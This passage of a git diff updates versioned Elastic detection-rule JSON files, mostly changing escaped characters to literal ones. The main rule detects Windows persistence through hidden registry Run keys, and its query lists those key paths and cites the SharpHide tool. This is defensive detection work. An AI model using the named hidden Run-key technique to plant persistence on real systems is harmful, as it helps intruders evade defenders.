\"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n 
\"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_103.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_103.json
index b56778c3d07..e06afeab810 100644
--- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_103.json
@@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", "note": "", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n 
\"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", 
@@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_104.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_104.json index ceebff52074..35f906335c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_104.json 
@@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", "note": "", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n 
\"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", 
@@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_105.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_105.json index 39b6aaa7884..4455d565759 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_105.json 
@@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", "note": "", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n 
\"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", 
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_106.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_106.json index de620b211ca..ec4aa05d6e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n 
\"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" 
@@ -43,7 +43,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_101.json b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_101.json index 8032c2eee4c..1899918f48d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_101.json 
+++ b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_101.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_102.json b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_102.json index 8cf5893a1a3..1c038193727 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_102.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_103.json b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_103.json index b593acc4cad..cf11a9919b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_103.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_104.json b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_104.json index 133643b46b4..3b97f4a963e 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_103.json b/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_103.json index e4eb0c6a662..8992479abbf 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_103.json +++ b/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_104.json b/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_104.json index c80d4cf2a4e..c39ca88be4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_104.json +++ b/packages/security_detection_engine/kibana/security_rule/aa8007f0-d1df-49ef-8520-407857594827_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_104.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_104.json index d07a6fa63ef..ebdfa72d0e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_104.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_104.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git 